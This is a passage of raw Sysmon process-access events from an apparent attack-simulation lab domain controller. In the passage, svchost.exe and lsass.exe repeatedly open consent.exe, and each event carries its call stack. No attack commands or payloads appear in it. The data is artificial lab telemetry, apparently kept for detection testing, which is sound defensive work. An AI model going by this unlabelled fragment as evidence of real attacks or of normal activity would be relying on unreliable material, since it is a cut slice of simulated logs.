Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21E7301BC97D3D7C00A0B8293A848780,SHA256=816C70DF5D8EB4EF8F0D028879F3C58D9D84A2270A8697E54FDD1B3BB36F4392,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.103{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.088{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.088{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.088{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.072{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.072{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:46.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 